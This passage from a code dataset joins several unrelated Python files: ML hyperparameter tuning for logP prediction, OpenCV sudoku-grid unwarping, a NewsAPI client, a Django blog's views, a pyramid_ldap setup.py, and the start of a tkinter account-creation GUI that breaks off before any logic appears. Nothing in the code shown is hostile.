trial.suggest_categorical('gamma', ['scale', 'auto'])\n\ttol = trial.suggest_loguniform('tol', 1e-5, 1e-1)\n\tC = trial.suggest_loguniform('C', 1e-4, 10)\n\tepsilon = trial.suggest_loguniform('epsilon', 1e-4, 1e-1)\n\n\treg = svm.SVR(kernel=kernel,\n\t\t\t\t gamma=gamma,\n\t\t\t\t tol=tol,\n\t\t\t\t C=C,\n\t\t\t\t epsilon=epsilon)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_KN(trial):\n\tn_neighbors = trial.suggest_int('n_neighbors', 1, 15)\n\tweights = trial.suggest_categorical('weights', ['uniform', 'distance'])\n\talgorithm = trial.suggest_categorical('algorithm', ['auto', 'ball_tree', 'kd_tree', 'brute'])\n\tleaf_size = trial.suggest_int('leaf_size', 10, 50)\n\n\treg = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors,\n\t\t\t\t\t\t\t\t \t weights=weights,\n\t\t\t\t\t\t\t\t\t algorithm=algorithm,\n\t\t\t\t\t\t\t\t\t leaf_size=leaf_size,\n\t\t\t\t\t\t\t\t\t n_jobs=-1)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_RFR(trial):\n\tn_estimators = trial.suggest_int('n_estimators', 50, 200)\n\tmax_depth = trial.suggest_int('max_depth', 100, 500)\n\tmin_samples_split = trial.suggest_int('min_samples_split', 2, 5)\n\tmin_samples_leaf = trial.suggest_int('min_samples_leaf', 1, 10)\n\tmax_features = trial.suggest_categorical('max_features', ['auto', 'sqrt', 'log2'])\n\n\treg = RFR(n_estimators=n_estimators,\n\t\t\t max_depth=max_depth,\n\t\t\t min_samples_split=min_samples_split,\n\t\t\t min_samples_leaf=min_samples_leaf,\n\t\t\t max_features=max_features,\n\t\t\t n_jobs=-1,\n\t\t\t random_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], 
X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n\ndef objective_LGB(trial):\n\tboosting_type = trial.suggest_categorical('boosting_type', ['gbdt', 'goss'])\n\tnum_leaves = trial.suggest_int('num_leaves', 30, 100)\n\tmax_depth = trial.suggest_int('max_depth', 700, 1000)\n\tlearning_rate = trial.suggest_loguniform('learning_rate', 5e-3, 5e-1)\n\tn_estimators = trial.suggest_int('n_estimators', 200, 500)\n\tmin_child_weight = trial.suggest_loguniform('min_child_weight', 1e-8, 1e-5)\n\tmin_child_samples = trial.suggest_int('min_child_samples', 8, 30)\n\treg_lambda = trial.suggest_loguniform('reg_lambda', 1e-9, 1e-5)\n\n\treg = lgb.LGBMRegressor(boosting_type=boosting_type,\n\t\t\t\t\t\t\tnum_leaves=num_leaves,\n\t\t\t\t\t\t\tmax_depth=max_depth,\n\t\t\t\t\t\t\tlearning_rate=learning_rate,\n\t\t\t\t\t\t\tn_estimators=n_estimators,\n\t\t\t\t\t\t\tmin_child_weight=min_child_weight,\n\t\t\t\t\t\t\tmin_child_samples=min_child_samples,\n\t\t\t\t\t\t\treg_lambda=reg_lambda,\n\t\t\t\t\t\t\tn_jobs=-1,\n\t\t\t\t\t\t\trandom_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n# def lgb_cv(X, y):\n# \tds = olgb.Dataset(X, y)\n# \tparams = {'objective':'regression',\n# \t\t\t 'metric':'rmse',\n# \t\t\t 'random_seed':0}\n# \ttuner = olgb.LightGBMTunerCV(params, ds, verbose_eval=-1, num_boost_round=1000, folds=KFold(n_splits=4), verbosity=-1)\n# \ttuner.run()\n# \tprint('LightGBM : Best parameters')\n# \tprint(tuner.best_params)\n# \tresult_reg(lgb.LGBMRegressor(**tuner.best_params), X, y)\n\n#*================================================*\n\ndf = pd.read_csv(sys.argv[1])\nsmiles = df['SMILES'].values\nRDKit_descriptor = RDKit_calculator(smiles)\n\n#set explanatory variables and response variable\nX = RDKit_descriptor.compute_2D_desc()\ny = df['LogP app'].values\n\n#Standardization of explanatory variables\nsc = StandardScaler()\nX = sc.fit_transform(X)\n\n#split data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=95, random_state=0)\n\n# study = optuna.create_study()\n# study.optimize(objective_Ridge, n_trials=100)\n# print('Ridge : Best parameters')\n# print(study.best_params)\n# result_reg(Ridge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_BRidge, n_trials=100)\n# print('BayesianRidge : Best parameters')\n# print(study.best_params)\n# result_reg(BayesianRidge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_SVR, n_trials=100)\n# print('SVR : Best parameters')\n# print(study.best_params)\n# result_reg(svm.SVR(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_KN, n_trials=100)\n# print('KNeighborsRegressor : Best parameters')\n# print(study.best_params)\n# result_reg(neighbors.KNeighborsRegressor(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_RFR, n_trials=100)\n# print('RFR : Best parameters')\n# print(study.best_params)\n# result_reg(RFR(**study.best_params))\n\nstudy = 
optuna.create_study()\nstudy.optimize(objective_LGB, n_trials=100)\nprint('LGB : Best parameters')\nprint(study.best_params)\nresult_reg(lgb.LGBMRegressor(**study.best_params))\n\n# lgb_cv(X, y)\n","sub_path":"newcomer3/newcomer3_6.py","file_name":"newcomer3_6.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584610079","text":"import cv2\n\nimg = cv2.imread('120_5096.jpg', cv2.CV_LOAD_IMAGE_COLOR)\ncv2.namedWindow('Image')\ncv2.imshow('Image',img)\ncv2.waitKey(0)\n##cv2.destroyAllWindows()\n\ngray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('color_image',img)\ncv2.imshow('gray_image',gray_image)\ncv2.waitKey(0)\n\n\nIn [81]: centroids = np.array(centroids,dtype = np.float32)\n\nIn [82]: c = centroids.reshape((shape(centroids)[0],shape(centroids)[1]))\n\nIn [86]: a = shape(centroids)[0]\n\nIn [87]: b = np.vstack([c2[i*(a/10):(i+1)*(a/10)][np.argsort(c2[i*(a/10):(i+1)*(a/10),0])] for i in xrange(a/10)])\n\nbm = b.reshape(((a/10),(a/10),2))\n\n\n\n############################################################################################################################################################\n\n## unwarp image (Sudoku Solver example)\n\n# 1. Image PreProcessing ( closing operation )\n\nimg = cv2.imread('120_5256.jpg') # 120_5096\nimg = cv2.GaussianBlur(img,(5,5),0)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nmask = np.zeros((gray.shape),np.uint8)\nkernel1 = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(11,11)) # ellipsoidal kernel (should test using other kernels to see the difference)\n\nclose = cv2.morphologyEx(gray,cv2.MORPH_CLOSE,kernel1) # advanced morphological transformation (closing operation - removing small black areas)\ndiv = np.float32(gray)/(close) # cleans up the image (no idea why!)\nres = np.uint8(cv2.normalize(div,div,0,255,cv2.NORM_MINMAX)) # linear normalization\nres2 = cv2.cvtColor(res,cv2.COLOR_GRAY2BGR) # gray to RGB\n\n# 2. Finding Sudoku Square and Creating Mask Image\n\nthresh = cv2.adaptiveThreshold(res,255,0,1,19,2)\ncontour,hier = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\nmax_area = 0\nbest_cnt = None\nfor cnt in contour:\n    area = cv2.contourArea(cnt)\n    if area > 1000: # need to test other values for project images\n        if area > max_area:\n            max_area = area\n            best_cnt = cnt\n\ncv2.drawContours(mask,[best_cnt],0,255,-1)\ncv2.drawContours(mask,[best_cnt],0,0,2)\n\nres = cv2.bitwise_and(res,mask)\n\n# 3. Finding Vertical lines\n\nkernelx = cv2.getStructuringElement(cv2.MORPH_RECT,(2,10)) # a 2 by 10 rectangle\n\ndx = cv2.Sobel(res,cv2.CV_16S,1,0)\ndx = cv2.convertScaleAbs(dx)\ncv2.normalize(dx,dx,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dx,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernelx,iterations = 1)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n    x,y,w,h = cv2.boundingRect(cnt)\n    if h/w > 5:\n        cv2.drawContours(close,[cnt],0,255,-1)\n    else:\n        cv2.drawContours(close,[cnt],0,0,-1)\nclose = cv2.morphologyEx(close,cv2.MORPH_CLOSE,None,iterations = 2)\nclosex = close.copy()\n\n# 4. 
Finding Horizontal Lines\n\nkernely = cv2.getStructuringElement(cv2.MORPH_RECT,(10,2))\ndy = cv2.Sobel(res,cv2.CV_16S,0,2)\ndy = cv2.convertScaleAbs(dy)\ncv2.normalize(dy,dy,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dy,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernely)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n x,y,w,h = cv2.boundingRect(cnt)\n if w/h > 5:\n cv2.drawContours(close,[cnt],0,255,-1)\n else:\n cv2.drawContours(close,[cnt],0,0,-1)\n\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,None,iterations = 2)\nclosey = close.copy()\n\n# 5. Finding Grid Points\n\nres = cv2.bitwise_and(closex,closey)\n\n############################################################################################################################################################\n\n## get rid of the grids\n\nres = cv2.bitwise_or(closex, closey)\nx = np.where(res > 0)\nx = np.array(x)\n\nfor i in range(shape(x)[1]):\n gray[x[0,i], x[1,i]] = 255\n\n############################################################################################################################################################\n\n# 6. Correcting the defects\n\ncontour, hier = cv2.findContours(res,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\ncentroids = []\nfor cnt in contour:\n mom = cv2.moments(cnt)\n (x,y) = int(mom['m10']/mom['m00']), int(mom['m01']/mom['m00'])\n cv2.circle(img,(x,y),4,(0,255,0),-1)\n centroids.append((x,y))\n\ncentroids = np.array(centroids,dtype = np.float32)\nc = centroids.reshape((shape(centroids)[0],2)) # check whether this line is required or not\n\n### just to properly sort the centroid indices\n\nc2 = c[np.argsort(c[:,1])] # sort along y-axis (sort the values along y-axis only leaving x-axis as it is to get the coordinates with y-axis sorted)\n # (100,2) array\n\nb = np.vstack([c2[i*10:(i+1)*10][np.argsort(c2[i*10:(i+1)*10,0])] for i in xrange(10)])\nbm = b.reshape((10,10,2))\n####\n\n# unwarp the image\n\noutput = np.zeros((450,450,3),np.uint8)\nfor i,j in enumerate(b): # almost like a percentage basis\n ri = i/10\n ci = i%10\n if ci != 9 and ri!=9:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32) # see tutorial for details (logic)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(450,450))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n############################################################################################################################################################\n\n## edit for project\n\na = round(shape(c2)[0]/10)\nb = np.vstack([c2[i*a:(i+1)*a][np.argsort(c2[i*a:(i+1)*a,0])] for i in xrange(10)])\na1 = round(shape(c2)[0]/a)\nbm = b.reshape((a1,a,2))\noutput = np.zeros((432, 576, 3),np.uint8)\n\nfor i,j in enumerate(b):\n ri = i/6\n ci = i%10\n if ri != 9 and ci < 5:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n #print i, src\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(432, 576))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n\nretval = cv2.getPerspectiveTransform(src,dst)\nwarp = 
cv2.warpPerspective(res2,retval,(450,450))\noutput[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n","sub_path":"Other files (test scripts etc.)/OpenCV.py","file_name":"OpenCV.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396929147","text":"\"\"\"\nThis file holds functions and constants that are specific to the\nNews API at http://newsapi.org\n\"\"\"\n\nimport logging\n\nfrom newsapi import NewsApiClient\n\nlogger = logging.getLogger(__name__)\n\ndef get_all_sources(news_api_key):\n\t\"\"\"\n\tReturn all the sources from the NewsAPI.\n\n\tReturn format:\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'id': 'abc-news',\n\t\t\t\t\t'name': 'ABC News',\n\t\t\t\t\t'description': 'Your trusted source for breaking blah blah.',\n\t\t\t\t\t'url': 'https://abcnews.go.com',\n\t\t\t\t\t'category': 'general',\n\t\t\t\t\t'language': 'en',\n\t\t\t\t\t'country': 'us'\n\t\t\t\t}\n\t\t\t]\n\t\tIf error:\n\t\t\tRaises exception.\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\t# This can also raise an exception\n\tsources = news_api_client.get_sources()\n\n\tif sources[\"status\"] == \"ok\":\n\t\t# We're all good\n\t\treturn sources[\"sources\"]\n\telse:\n\t\tlogger.exception(\"Error getting sources. Got the following return object: {0}\".format(\n\t\t\tsources\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting sources. See log.\")\n\ndef get_top_articles(source_id, news_api_key):\n\t\"\"\"\n\tReturn all the current top articles from the given source.\n\tIf there is any error whatsoever, this will throw an exception. So, if articles are returned\n\tand the function exits successfully, there have been no errors.\n\n\tReturn format:\n\t\tIf error:\n\t\t\traises Exception\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t\t}, \n\t\t\t\t{\n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t]\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\tresponse = news_api_client.get_top_headlines(\n\t\tsources=source_id,\n\t\tpage_size=100,\n\t\tpage=1 # This is 1-indexed\n\t)\n\n\tif response[\"status\"] != \"ok\":\n\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\tsource_id,\n\t\t\tresponse\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting articles. 
See log.\")\n\t\n\t# Now, we need to check if we actually got all the top articles from this one request\n\t# response will contain a 'totalResults' field, which we can use to figure out if there are more we need to get\n\n\tcurr_articles = clean_top_articles(response[\"articles\"])\n\tnum_total_articles = int(response['totalResults'])\n\tcurr_page = 2\n\twhile len(curr_articles) < num_total_articles:\n\t\tresponse = news_api_client.get_top_headlines(\n\t\t\tsources=source_id,\n\t\t\tpage_size=100,\n\t\t\tpage=curr_page # This is 1-indexed\n\t\t)\n\n\t\tif response[\"status\"] != \"ok\":\n\t\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\t\tsource_id,\n\t\t\t\tresponse\n\t\t\t), exc_info=True)\n\n\t\t\traise Exception(\"There was an error getting articles. See log.\")\n\t\telse:\n\t\t\tcurr_articles.extend(clean_top_articles(response['articles']))\n\t\t\tcurr_page += 1\n\n\treturn curr_articles\n\ndef clean_top_articles(articles):\n\t\"\"\"\n\tBefore: \n\t\t[\n\t\t\t{\n\t\t\t\t'source': {\n\t\t\t\t\t'id': 'abc-news', \n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\tAfter:\n\t\t[\n\t\t\t{\n\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... 
… [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\t\"\"\"\n\n\tfor article in articles:\n\t\tsource_id = article['source']['id']\n\t\tdel article['source']\n\t\tarticle['source_id'] = source_id\n\t\n\treturn articles\n\n###############################\n# CONSTANTS\n###############################\n\nnews_api_categories = {\n    \"business\",\n    \"entertainment\",\n    \"general\",\n    \"health\",\n    \"science\",\n    \"sports\",\n    \"technology\"\n}\n\nnews_api_languages = {\n    \"ar\",\n    \"de\",\n    \"en\",\n    \"es\",\n    \"fr\",\n    \"he\",\n    \"it\",\n    \"nl\",\n    \"no\",\n    \"pt\",\n    \"ru\",\n    \"se\",\n    \"ud\",\n    \"zh\"\n}\n\nnews_api_countries = {\n    \"ae\",\n\t\"ar\",\n\t\"at\",\n\t\"au\",\n\t\"be\",\n\t\"bg\",\n\t\"br\",\n\t\"ca\",\n\t\"ch\",\n\t\"cn\",\n\t\"co\",\n\t\"cu\",\n\t\"cz\",\n\t\"de\",\n\t\"eg\",\n\t\"fr\",\n\t\"gb\",\n\t\"gr\",\n\t\"hk\",\n\t\"hu\",\n\t\"id\",\n\t\"ie\",\n\t\"il\",\n\t\"in\",\n\t\"it\",\n\t\"jp\",\n\t\"kr\",\n\t\"lt\",\n\t\"lv\",\n\t\"ma\",\n\t\"mx\",\n\t\"my\",\n\t\"ng\",\n\t\"nl\",\n\t\"no\",\n\t\"nz\",\n\t\"ph\",\n\t\"pl\",\n\t\"pt\",\n\t\"ro\",\n\t\"rs\",\n\t\"ru\",\n\t\"sa\",\n\t\"se\",\n\t\"sg\",\n\t\"si\",\n\t\"sk\",\n\t\"th\",\n\t\"tr\",\n\t\"tw\",\n\t\"ua\",\n\t\"us\",\n\t\"ve\",\n\t\"za\"\n}\n\n","sub_path":"news-worker/worker/utils/news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"608262620","text":"import cbtl_base\nfrom PIL import Image\n\ndef withinRange(px1,px2,tol):\n    # True only if every checked channel of px2 is within tol of px1\n    for i in range(2):\n        if not (px1[i]-tol <= px2[i] <= px1[i]+tol):\n            return False\n    return True\n\ndef imgbool(img1,img2,tolerance):\n    pmer = img1.load()\n    cntre = img2.load()\n    origmask = Image.new(\"RGBA\",img1.size,color = (0,0,0,0))\n    mask = origmask.load()\n    #thru all pixels: if they are not within tolerance range, write to mask.\n    for y in range(img1.height):\n        for x in range(img1.width):\n            if not withinRange(pmer[x,y],cntre[x,y],tolerance):\n                mask[x,y] = (0,0,0,255)\n    #origmask.show()\n    bg = Image.new(\"RGBA\",img1.size,color = (0,0,0,255))\n    return Image.composite(bg,img2,mask = origmask)\n\nif __name__ == \"__main__\":\n    intro1=Image.open(\"./intro1.png\")\n    intro2=Image.open(\"./intro2.png\")\n    imgbool(intro1,intro2,0).show()\n    imgbool(intro1,intro2,2).show()\n    imgbool(intro1,intro2,5).show()\n    imgbool(intro1,intro2,15).show()\n","sub_path":"cbtl_bool.py","file_name":"cbtl_bool.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"235098891","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.rst')).read()\nCHANGES = open(os.path.join(here, 'CHANGES.txt')).read()\n\nrequires = [\n    'pyramid>=1.3a9',\n    ]\nif not 'READTHEDOCS' in os.environ:\n    # hail mary for readthedocs\n    requires.extend(['ldappool', 'python-ldap'])\n\nsampleapp_extras = [\n    'waitress',\n    'pyramid_debugtoolbar',\n    ]\ntesting_extras = ['nose', 'coverage']\ndocs_extras = ['Sphinx']\n\nsetup(name='pyramid_ldap',\n      version='0.1',\n      description='pyramid_ldap',\n      long_description=README + '\\n\\n' + CHANGES,\n      classifiers=[\n          \"Programming Language :: Python\",\n          \"Framework :: Pylons\",\n          \"Programming Language :: Python :: 2.6\",\n          \"Programming Language :: Python :: 2.7\",\n          \"Topic :: System :: Systems Administration :: Authentication/Directory :: LDAP\",\n          \"License :: Repoze Public 
License\",\n          ],\n      author='Chris McDonough',\n      author_email='pylons-discuss@groups.google.com',\n      url='http://pylonsproject.org',\n      license=\"BSD-derived (http://www.repoze.org/LICENSE.txt)\",\n      keywords='web pyramid pylons ldap',\n      packages=find_packages(),\n      include_package_data=True,\n      zip_safe=False,\n      install_requires=requires,\n      tests_require=requires,\n      extras_require = {\n        'sampleapp':sampleapp_extras,\n        'docs':docs_extras,\n        'testing':testing_extras,\n        },\n      test_suite=\"pyramid_ldap\",\n      entry_points = \"\"\"\\\n      [paste.app_factory]\n      sampleapp = sampleapp:main\n      \"\"\",\n      )\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"603565083","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .models import Post\nfrom .forms import EmailPostForm\nfrom django.core.mail import send_mail\nfrom taggit.models import Tag\n\n# Create your views here.\ndef post_list(request, tag_slug=None):\n    object_list=Post.published.all()\n    tag = None\n\n    if tag_slug:\n        tag = get_object_or_404(Tag, slug=tag_slug)\n        object_list = object_list.filter(tags__in=[tag])\n\n    paginator = Paginator(object_list, 3)#3 posts in each page\n    page = request.GET.get('page')\n    try:\n    \tposts = paginator.page(page)\n    except PageNotAnInteger:\n    \t#if page is not an integer deliver the first page\n    \tposts = paginator.page(1)\n    except EmptyPage:\n    \t#if page is out of range deliver last page of results\n    \tposts = paginator.page(paginator.num_pages)\n    return render(request, 'blog/post/list.html', {'page':page, 'posts':posts, 'tag':tag, 'active_blog': True})\n\ndef post_detail(request, year, month, day, post):\n\tpost = get_object_or_404(Post, slug=post,\n\t\tstatus='published',\n\t\tpublish__year=year,\n\t\tpublish__month=month,\n\t\tpublish__day=day)\n\treturn render(request, 'blog/post/detail.html', {'post':post, 'active_blog': True})\n\n\ndef post_share(request, post_id):\n    # Retrieve post by id\n    post = get_object_or_404(Post, id=post_id, status='published')\n    sent = False\n\n    if request.method == 'POST':\n        # Form was submitted\n        form = EmailPostForm(request.POST)\n        if form.is_valid():\n            # Form fields passed validation\n            cd = form.cleaned_data\n            post_url = request.build_absolute_uri(post.get_absolute_url())\n            subject = '{} ({}) recommends you reading \"{}\"'.format(cd['name'], cd['email'], post.title)\n            message = 'Read \"{}\" at {}\\n\\n{}\\'s comments: {}'.format(post.title, post_url, cd['name'], cd['comments'])\n            send_mail(subject, message, 'admin@myblog.com', [cd['to']])\n            sent = True\n    else:\n        \n        if request.user.is_authenticated():\n            form = EmailPostForm(initial = {'email': request.user.email, 'name': request.user.get_full_name()})\n        else:\n            form = EmailPostForm()\n\n    return render(request, 'blog/post/share.html', {'post': post,\n                                                    'form': form,\n                                                    'sent': sent, 'active_blog': True})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653368522","text":"\n# Heap sort using Python's built-in heapq module\n\nimport heapq\nimport random\n\nli = list(range(100))\nrandom.shuffle(li)\nprint(li)\n\nheapq.heapify(li) # build the heap (a min-heap)\nprint(li)\n\nn = len(li)\nfor i in range(n):\n    
print(heapq.heappop(li),end=\",\")","sub_path":"排序方法/python堆排序.py","file_name":"python堆排序.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"476915279","text":"import os\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport threading\nimport datetime\nimport configparser\nimport tkinter as tk\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter.ttk import Notebook\nfrom tkinter import messagebox\nfrom selenium.common.exceptions import WebDriverException\n\nimport helper\nfrom gbot import Gbot\n\nclass Facade(tk.Tk):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.title('Gbot')\n\t\tself.geometry('600x600')\n\t\tself.head_font = ('Verdana', 12)\n\t\tself.gbot = None\t\n\t\tself.config = configparser.ConfigParser()\n\t\tself.configfile = helper.resource_path('config.ini')\n\t\tself.accounts_dir = helper.resource_path('results')\n\t\tself.namesfile = helper.resource_path('names.txt')\n\n\t\tself.current_date = datetime.datetime.now()\n\t\tself.current_date = self.current_date.strftime(\"%Y-%m-%d\")\n\t\t\n\t\ttab_control = Notebook(self)\n\t\tself.main(tab_control)\n\t\tself.accounts(tab_control)\n\t\tself.names(tab_control)\n\t\tself.configs(tab_control)\n\n\tdef main(self, tab_control):\n\t\tmain_tab = tk.Frame(tab_control)\n\t\ttab_control.add(main_tab, text='Главная')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n \n\t\tyes_sign = tk.PhotoImage(file=helper.resource_path('img/yes_sign.png'))\n\n\t\tself.accounts_amount = tk.IntVar()\n\t\tself.accounts_amount.set(10)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Лог:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.log_list_field = ScrolledText(main_tab, height=20)\n\t\tself.log_list_field.pack(fill=tk.X, padx=5)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Сколько аккаунтов создать:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(40, 0), padx=(5, 0))\n\t\taccounts_amount_field = tk.Entry(main_tab, textvariable=self.accounts_amount, width=30)\n\t\taccounts_amount_field.pack(side=tk.TOP, anchor=tk.NW, padx=(5, 0))\n\n\t\tself.start_btn = tk.Button(main_tab, text='Начать', command=self.on_start, width=30, height=2)\n\t\tself.start_btn.pack(side=tk.LEFT, anchor=tk.NW, pady=(30, 0), padx=(5, 